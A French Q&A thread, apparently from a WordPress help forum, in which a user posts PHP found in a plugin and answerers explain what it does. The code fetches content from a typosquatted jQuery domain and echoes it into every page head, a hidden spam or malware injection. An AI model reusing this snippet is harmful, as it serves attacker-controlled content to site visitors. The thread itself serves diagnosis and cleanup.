J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?
add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
if(function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
$jquery = curl_exec($ch);
curl_close($ch);
echo "$jquery";
}
}
add_action('wp_head', 'wp__head');
}
Réponses:
Il charge un bloc de balisage contenant du spam (j'ai pensé à publier un peu de la source mais je ne veux en aucun cas annoncer le contenu) à partir d'un domaine qui est une faute d'orthographe proche du domaine
http://jquery.com/
- - utilisé par jQuery , une bibliothèque Javascript réputée et populaire et que WordPress inclut dans le Core. Je pense que l'idée est de sembler charger cette bibliothèque, alors qu'en fait, charger quelque chose de très différent.Et il tente par d'autres moyens de sembler charger jQuery. Remarquez le nom de la variable
$jquery
.Il peut également tenter de charger des scripts malveillants. Je n'ai pas vérifié. Je l' appellerais certainement dangereux, d'autant plus que le contenu de cette page peut changer à tout moment si les contrôleurs de domaine en ont envie.
Au mieux, cela va endommager votre site car les moteurs de recherche regardent les sites qui propagent du spam.
Ne l'utilisez pas. Il ne fait rien de bénéfique pour vous ou pour toute autre personne sur le Web autre que les personnes qui gèrent le site. Si vous l'avez trouvé sur un site réputé, signalez-le-leur.
la source
Oui, c'est un code dangereux qui charge du contenu à partir d'un site de spam.
Vous n'avez pas nommé le plugin, mais si vous avez trouvé ce code après qu'il a été installé sur votre site Web, il est possible que le code du plugin ne provienne pas du développeur comme celui-ci, mais a été piraté après son installation. Si tel est le cas, vous pourriez trouver le code malveillant sur plus de votre site Web que juste ce plugin.
Vérifiez le code du plugin téléchargé d'où que vous ayez obtenu le plugin à l'origine, et voyez si ce code malveillant était là à l'origine. Sinon, votre site a été piraté. Si vous déterminez que c'est le cas, lisez cet article du Codex .
la source